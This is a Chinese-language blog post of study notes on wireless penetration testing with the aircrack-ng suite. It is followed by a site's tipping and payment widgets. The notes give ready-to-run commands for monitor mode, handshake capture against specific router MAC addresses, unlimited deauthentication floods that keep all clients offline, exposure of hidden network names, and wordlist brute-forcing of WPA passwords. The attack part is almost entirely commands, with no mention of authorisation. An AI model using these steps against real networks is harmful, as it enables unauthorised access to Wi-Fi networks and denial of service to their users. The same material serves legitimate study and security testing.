无线渗透学习笔记

配置无线网卡和信道

激活无线网卡至monitor即监听模式,并监听无线流量
airmon-ng start wlan0&&airodump-ng wlan0mon

查看需要破解的网在哪个频道(CH),数据传输量(Beacons)如何。


如果kali报错,网卡处于busy状态,则杀死所有占用进程airmon-ng check kill 

使用iwconfig切换信道,和目标路由器信道一致
iwconfig wlan0 channel 1

或者 airodump-ng wlan1mon -c 1 

无线网卡恢复到managed状态,也就是平常上网使用的状态

iwconfig wlan0mon mode managed 改变网卡的工作模式

抓包

开始抓包 ,用airodump-ng,-w是essid即wifi的名字,-c是信道号,--bssid是路由器mac地址,wlan0mon是无线网卡的名字,在配置无线网卡的时候,airmon-ng就修改了网卡的名字,如果不清楚可以ifconfig看。

airodump-ng -w tp_26 -c 1 --bssid 64:6E:97:C2:C6:A2  wlan0mon    

为了加速握手包的获取,我们可以使用aireplay来给AP发送deauth包,假设无线客户端的mac为ff:ff:ff:ff:ff:ff,-a参数带路由器的mac,加上-0 参数,表示发送多少次断网包,-0 0设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网。
aireplay-ng -a   64:6E:97:C2:C6:A2    -0 0 wlan0mon  


上面的命令会断开所有客户端和路由器的连接,使用-c参数来精确断开一个客户端和路由器的连接:

aireplay-ng -0 0 -a B4:0F:3B:C4:ED:F1 -c 02:85:B0:12:7C:DF wlan0mon
 

对于隐藏了essid的wifi,一种方法是暴力猜解,这种方法很费时,另一种是发送deauth包断开连接,但是需要有客户端与路由器有连接。介绍第二种方法
1、先开启专门的监听
airodump-ng -c 11 --bssid DC:21:E2:A4:F3:44 wlan0mon
2、断网攻击
aireplay-ng -a  66:6e:97:a1:d6:a1 -0 10 wlan0mon
不一会儿就会监听界面就会显示essid

5G频段的监听
airodump-ng -C 5000-6000 wlan0
找到响应的热点的信道,如ch 在153
airodump-ng -c 153 wlan0 

暴力破解密码

windows下使用Elcomsoft Wireless Security Auditor(EWSA)软件进行暴力破解

kali下就用aircrack-ng。

aircrack-ng 01.cap -w ./字典.txt

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值